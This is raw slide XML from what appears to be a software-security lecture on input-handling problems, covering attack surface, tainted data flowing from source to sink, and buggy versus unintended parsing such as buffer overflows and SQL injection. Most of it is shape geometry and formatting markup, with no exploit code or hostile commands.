                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="679847" y="1020619"/>
                    <a:pt x="1007738" y="1022158"/>
                    <a:pt x="1332550" y="1034473"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1657362" y="1046788"/>
                    <a:pt x="2422441" y="1052946"/>
                    <a:pt x="2422441" y="1052946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2802671" y="1056025"/>
                    <a:pt x="3270647" y="1077576"/>
                    <a:pt x="3613932" y="1052946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3957217" y="1028316"/>
                    <a:pt x="4288187" y="980594"/>
                    <a:pt x="4482150" y="905164"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4676113" y="829734"/>
                    <a:pt x="4720756" y="737370"/>
                    <a:pt x="4777713" y="600364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4834671" y="463358"/>
                    <a:pt x="4829283" y="273242"/>
                    <a:pt x="4823895" y="83127"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="730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6407"/>
              <a:endParaRPr lang="en-GB" sz="2177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Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA19B3B5-594C-DCC6-7D96-A38949D4CC31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2311563" y="126049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3" name="Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12D723ED-ADA1-C6E0-BC7B-87F1DA1A2836}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2905157" y="1776521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" name="Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D268713-A3A2-8609-65A1-0CF4C6DE6FA2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3118548" y="2265345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7" name="Explosie 2 65">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5347196-19E4-6B67-581B-DC2029683211}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2937418" y="2773647"/>
              <a:ext cx="225749" cy="171951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2" tIns="45710" rIns="91422" bIns="45710"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr defTabSz="492023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 sz="1633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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="29724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470034" y="1914781"/>
              <a:ext cx="588384" cy="4640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Rechte verbindingslijn met pijl 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="2544688" y="2393138"/>
              <a:ext cx="738493" cy="961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Rechte verbindingslijn met pijl 2"/>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks noChangeShapeType="1"/>
              <a:endCxn id="17" idx="2"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2529028" y="2681807"/>
              <a:ext cx="529751" cy="24183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95319A8-F634-597A-E184-68C07CEBB91C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="810519" y="5663636"/>
            <a:ext cx="387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Typical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client-side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attack surface</a:t>
            </a:r>
            <a:endParaRPr lang="en-N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Afgeronde rechthoek 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C246D3-5AF6-143A-DB55-0E7012455A73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="565457" y="2042496"/>
            <a:ext cx="1293023" cy="370041"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="AAE97B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  <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="145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MS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="145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Offuce</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="145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Explosie 2 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{735B60CE-AD7C-0E3E-6EA1-6BE2D2F65270}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1508078" y="2197317"/>
            <a:ext cx="573060" cy="240455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0" rIns="91422" bIns="45710"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="492023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 sz="1633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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Rechte verbindingslijn met pijl 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAA55336-1883-B0B6-2DA3-32F97AEAFC1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73907" y="2247163"/>
            <a:ext cx="558043" cy="24774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0115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6"/>
            <a:ext cx="7761288" cy="603370"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="4000" baseline="-25000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Terminology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Untrusted input travels as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tainted data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>source</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sink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Sinks can be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>external API or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rgbClr val="CC66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>internal function 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>
                <a:solidFill>
                  <a:srgbClr val="CC66FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t> bug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3047348" y="1709366"/>
            <a:ext cx="3039066" cy="262113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334747" y="1756345"/>
            <a:ext cx="1045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source</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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fgeronde rechthoek 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6816073" y="2193900"/>
            <a:ext cx="1552518" cy="8825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Another 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7" name="Explosie 2 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6503023" y="2377544"/>
            <a:ext cx="698614" cy="382384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Picture 2" descr="C:\Users\erikpoll\Desktop\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9078"/>
            <a:ext cx="774968" cy="74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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1988401" y="2210030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575986" y="2495157"/>
            <a:ext cx="1517522" cy="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endParaRPr lang="en-GB" altLang="en-US" sz="1814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12" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6167243" y="2437598"/>
            <a:ext cx="713652" cy="3823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404937" y="2550323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3061203" y="4641250"/>
            <a:ext cx="3053225" cy="49243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Platform libraries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846219" y="20531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sink</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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985530" y="2059787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015897" y="2414820"/>
            <a:ext cx="151346" cy="5145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814313" y="4247913"/>
            <a:ext cx="497629" cy="14582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3" name="Explosie 2 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3746701" y="4538311"/>
            <a:ext cx="698614" cy="262693"/>
          </a:xfrm>
          <a:prstGeom prst="irregularSeal2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" name="Right Arrow 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000">
            <a:off x="3915174" y="4311639"/>
            <a:ext cx="301461" cy="4455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3991127" y="4417026"/>
            <a:ext cx="144000" cy="1546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5162348" y="3484062"/>
            <a:ext cx="151346" cy="514512"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="CC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1" name="Vrije vorm 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3089349" y="3152140"/>
            <a:ext cx="1314705" cy="1178358"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 1724779"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 1228507"/>
              <a:gd name="connsiteX1" fmla="*/ 265246 w 1724779"/>
              <a:gd name="connsiteY1" fmla="*/ 314107 h 1228507"/>
              <a:gd name="connsiteX2" fmla="*/ 307127 w 1724779"/>
              <a:gd name="connsiteY2" fmla="*/ 823658 h 1228507"/>
              <a:gd name="connsiteX3" fmla="*/ 572373 w 1724779"/>
              <a:gd name="connsiteY3" fmla="*/ 893459 h 1228507"/>
              <a:gd name="connsiteX4" fmla="*/ 984202 w 1724779"/>
              <a:gd name="connsiteY4" fmla="*/ 642174 h 1228507"/>
              <a:gd name="connsiteX5" fmla="*/ 760837 w 1724779"/>
              <a:gd name="connsiteY5" fmla="*/ 390888 h 1228507"/>
              <a:gd name="connsiteX6" fmla="*/ 1284348 w 1724779"/>
              <a:gd name="connsiteY6" fmla="*/ 349007 h 1228507"/>
              <a:gd name="connsiteX7" fmla="*/ 1724098 w 1724779"/>
              <a:gd name="connsiteY7" fmla="*/ 530491 h 1228507"/>
              <a:gd name="connsiteX8" fmla="*/ 1382070 w 1724779"/>
              <a:gd name="connsiteY8" fmla="*/ 663114 h 1228507"/>
              <a:gd name="connsiteX9" fmla="*/ 1256428 w 1724779"/>
              <a:gd name="connsiteY9" fmla="*/ 949301 h 1228507"/>
              <a:gd name="connsiteX10" fmla="*/ 1249447 w 1724779"/>
              <a:gd name="connsiteY10" fmla="*/ 1228507 h 122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4779" h="1228507">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="107029" y="88415"/>
                  <a:pt x="214058" y="176831"/>
                  <a:pt x="265246" y="314107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="316434" y="451383"/>
                  <a:pt x="255939" y="727099"/>
                  <a:pt x="307127" y="823658"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="358315" y="920217"/>
                  <a:pt x="459527" y="923706"/>
                  <a:pt x="572373" y="893459"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="685219" y="863212"/>
                  <a:pt x="952791" y="725936"/>
                  <a:pt x="984202" y="642174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1015613" y="558412"/>
                  <a:pt x="710813" y="439749"/>
                  <a:pt x="760837" y="390888"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="810861" y="342027"/>
                  <a:pt x="1123805" y="325740"/>
                  <a:pt x="1284348" y="349007"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1444891" y="372274"/>
                  <a:pt x="1707811" y="478140"/>
                  <a:pt x="1724098" y="530491"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1740385" y="582842"/>
                  <a:pt x="1460015" y="593312"/>
                  <a:pt x="1382070" y="663114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1304125" y="732916"/>
                  <a:pt x="1278532" y="855069"/>
                  <a:pt x="1256428" y="949301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1234324" y="1043533"/>
                  <a:pt x="1241885" y="1136020"/>
                  <a:pt x="1249447" y="1228507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2986915" y="2881089"/>
            <a:ext cx="151346" cy="51451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2" name="Vrije vorm 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3103310" y="2833894"/>
            <a:ext cx="2118106" cy="955146"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 2115143"/>
              <a:gd name="connsiteY0" fmla="*/ 296889 h 864657"/>
              <a:gd name="connsiteX1" fmla="*/ 495591 w 2115143"/>
              <a:gd name="connsiteY1" fmla="*/ 282929 h 864657"/>
              <a:gd name="connsiteX2" fmla="*/ 488611 w 2115143"/>
              <a:gd name="connsiteY2" fmla="*/ 101445 h 864657"/>
              <a:gd name="connsiteX3" fmla="*/ 677075 w 2115143"/>
              <a:gd name="connsiteY3" fmla="*/ 3723 h 864657"/>
              <a:gd name="connsiteX4" fmla="*/ 1040043 w 2115143"/>
              <a:gd name="connsiteY4" fmla="*/ 227087 h 864657"/>
              <a:gd name="connsiteX5" fmla="*/ 732916 w 2115143"/>
              <a:gd name="connsiteY5" fmla="*/ 415552 h 864657"/>
              <a:gd name="connsiteX6" fmla="*/ 1326229 w 2115143"/>
              <a:gd name="connsiteY6" fmla="*/ 478373 h 864657"/>
              <a:gd name="connsiteX7" fmla="*/ 1605435 w 2115143"/>
              <a:gd name="connsiteY7" fmla="*/ 108425 h 864657"/>
              <a:gd name="connsiteX8" fmla="*/ 1877661 w 2115143"/>
              <a:gd name="connsiteY8" fmla="*/ 87484 h 864657"/>
              <a:gd name="connsiteX9" fmla="*/ 2114987 w 2115143"/>
              <a:gd name="connsiteY9" fmla="*/ 338770 h 864657"/>
              <a:gd name="connsiteX10" fmla="*/ 1842761 w 2115143"/>
              <a:gd name="connsiteY10" fmla="*/ 492333 h 864657"/>
              <a:gd name="connsiteX11" fmla="*/ 1598455 w 2115143"/>
              <a:gd name="connsiteY11" fmla="*/ 562135 h 864657"/>
              <a:gd name="connsiteX12" fmla="*/ 1437912 w 2115143"/>
              <a:gd name="connsiteY12" fmla="*/ 736639 h 864657"/>
              <a:gd name="connsiteX13" fmla="*/ 1633356 w 2115143"/>
              <a:gd name="connsiteY13" fmla="*/ 855301 h 864657"/>
              <a:gd name="connsiteX14" fmla="*/ 2073106 w 2115143"/>
              <a:gd name="connsiteY14" fmla="*/ 848321 h 86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5143" h="864657">
                <a:moveTo>
                  <a:pt x="0" y="296889"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="207078" y="306196"/>
                  <a:pt x="414156" y="315503"/>
                  <a:pt x="495591" y="282929"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="577026" y="250355"/>
                  <a:pt x="458364" y="147979"/>
                  <a:pt x="488611" y="101445"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="518858" y="54911"/>
                  <a:pt x="585170" y="-17217"/>
                  <a:pt x="677075" y="3723"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="768980" y="24663"/>
                  <a:pt x="1030736" y="158449"/>
                  <a:pt x="1040043" y="227087"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1049350" y="295725"/>
                  <a:pt x="685218" y="373671"/>
                  <a:pt x="732916" y="415552"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="780614" y="457433"/>
                  <a:pt x="1180809" y="529561"/>
                  <a:pt x="1326229" y="478373"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1471649" y="427185"/>
                  <a:pt x="1513530" y="173573"/>
                  <a:pt x="1605435" y="108425"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1697340" y="43277"/>
                  <a:pt x="1792736" y="49093"/>
                  <a:pt x="1877661" y="87484"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1962586" y="125875"/>
                  <a:pt x="2120804" y="271295"/>
                  <a:pt x="2114987" y="338770"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2109170" y="406245"/>
                  <a:pt x="1928850" y="455106"/>
                  <a:pt x="1842761" y="492333"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1756672" y="529560"/>
                  <a:pt x="1665930" y="521417"/>
                  <a:pt x="1598455" y="562135"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1530980" y="602853"/>
                  <a:pt x="1432095" y="687778"/>
                  <a:pt x="1437912" y="736639"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1443729" y="785500"/>
                  <a:pt x="1527490" y="836687"/>
                  <a:pt x="1633356" y="855301"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1739222" y="873915"/>
                  <a:pt x="1906164" y="861118"/>
                  <a:pt x="2073106" y="848321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4" name="Vrije vorm 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3120225" y="2216625"/>
            <a:ext cx="3066176" cy="872279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" name="Right Arrow 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2016351" y="2992872"/>
            <a:ext cx="886651" cy="2875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92FA9174-4253-1504-C109-C867C58A6A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6407"/>
            <a:fld id="{B6B94CA6-E49D-442B-97BC-8D63D6776407}" type="slidenum">
              <a:rPr lang="en-US" altLang="nl-NL"/>
              <a:pPr defTabSz="446407"/>
              <a:t>53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3470662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266246"/>
            <a:ext cx="7772400" cy="309885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3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Understanding root causes </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="72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INPUT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>problems</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-GB" altLang="nl-NL" sz="4000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" altLang="nl-NL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DBFCF-253D-46EE-9AC7-7BD7B39DA6AF}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>54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93561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Recurring themes: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>parsing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>languages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Processing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> an input begins with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsing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depends on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input language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format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accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2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339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>TCP/IP packets, HTTP, HTML, X509, mp3, JPEG, PDF, URL,    email address, Word, Excel, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="339933"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-285750"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Input handling bugs often come down to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parsing bugs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buggy parsing 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buffer overflow in PDF parsing)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unintended parsing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parsing user input as SQL command)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1696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F747-E6DB-9241-49E5-4A57118A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F6BAC33-2208-574B-E70F-3A8E4861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Two kinds of problems: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t>bugs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>vs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0"/>
              <a:t> features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07950ECD-1E83-C37F-56B1-B9C64EE18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56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D86724A7-0B9A-2535-E1F4-AC340B6E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445" y="3545640"/>
            <a:ext cx="342576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(abuse of) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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 feature </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="254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9C8C8AB-AF29-A243-20D2-4C021F22FB98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AF4A042F-3FDF-9677-8F86-D6341630E417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898AE81C-6567-7759-F95C-D8FE89EA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0C9AD35B-63F8-C266-14C8-C99C7C8D3F0A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478296DE-81B0-B166-0287-67EE02EE1225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6A4693E8-3E3C-40F4-8446-B69BF24F9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790C0FA1-3B0E-6A7A-E329-3135DB49A2D1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EFFA87DB-14A4-33D0-6C03-592697149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9BA08C9-D794-C841-00D9-FC3F6E596C5E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55F0953-A7E1-3C2B-4962-89FA02FE4E18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4270B076-81F1-DF30-2B77-636262DBA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2F7AD0C2-DB0E-C467-8377-B99AD604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D13A2491-6EB1-4F79-3749-CB45A78F57F6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6065280" cy="1710720"/>
            <a:chOff x="1198642" y="989203"/>
            <a:chExt cx="6685645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F60F2802-A8A8-1812-868F-4DDED8A8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7091D32D-509F-32FC-6CFB-64FE0F3AF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1A6023FD-70F5-928B-FE0D-411CBF71E225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6C744B4C-E850-6866-FDE7-6D738FA38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B92AB75A-45DC-50CF-46C5-C4A2746C7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2222717" cy="47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 dirty="0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26EEF7A0-64A0-4A16-2760-93368725E2F9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656B9920-6B96-CB70-6B59-4C46159178D2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9CC0DD6-A643-5660-394C-72FB98B89005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AFED62B9-DDC7-3EF7-C809-5BF332A5F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  <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="409963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CACB-3E33-DED9-407E-EE864B77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1C1D08F-8826-A407-9F30-0DF21A19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Buggy parsing  vs Unintended parsing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6416E20E-9505-99C6-54A3-EF7D16856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57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B0C492DE-C047-F355-0FCB-5E8F313C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480" y="3853205"/>
            <a:ext cx="445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Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>unintended parsing</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Pieces NFI" panose="02000000000000000000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5147EE-63F0-9932-4542-0AD0760DDF4B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835FB59E-6E77-4B74-99A7-BEF3175C6EB9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A52B3DE6-0C9E-531E-E9B4-93332D3EF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72B8486F-71AF-951C-39CC-937A9B957793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43B40DA3-BBDD-4C07-5E55-84093EC5B8CD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3FA99C92-64BC-4D4A-29F7-184D62AC4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47D32652-CB6F-2399-0D43-677E11E34F45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33379631-609A-BD38-C750-8868F9A1A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473E7F6-436C-BBE9-0045-DC691970163C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77559FC-8B5A-9B78-D08B-73288827236B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3645E504-0DC5-474E-2635-C0F3FF708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B89C7245-1BE3-2724-FB2D-0F7BB8B18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09FDBC15-0AA6-2791-112A-4A7DC8375581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7507184" cy="1710720"/>
            <a:chOff x="1198642" y="989203"/>
            <a:chExt cx="8275029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8E6B6D4A-9E44-01D1-5ED1-4FC5BD7E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DD0BF1EC-F363-8836-83F0-B07B5CB5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EA3BB70-4260-843D-EBC5-A383BDD4F49E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DB9AE7B1-8A83-E107-0D66-05AB08BEB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22D79513-67FB-2893-0BF6-FC2D25A30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3812101" cy="50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  <a:latin typeface="Pieces NFI" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                </a:rPr>
                <a:t>buggy parsing</a:t>
              </a:r>
              <a:endParaRPr lang="en-GB" altLang="en-US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AFB14584-0189-FA66-E6A3-53FA09E1B466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BB0DCBD1-D54F-E7CB-6EE8-7397A8593638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201E61A-136F-E0D6-7EA6-9BC7D7B98AFE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F4EE7D6D-FBCA-480E-1793-DFD1C0F7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  <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="124727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(1) : insecure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cause security bugs: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/>
              <a:t>esp. if parser is written in memory unsafe language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>memory corruption </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>can lead to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
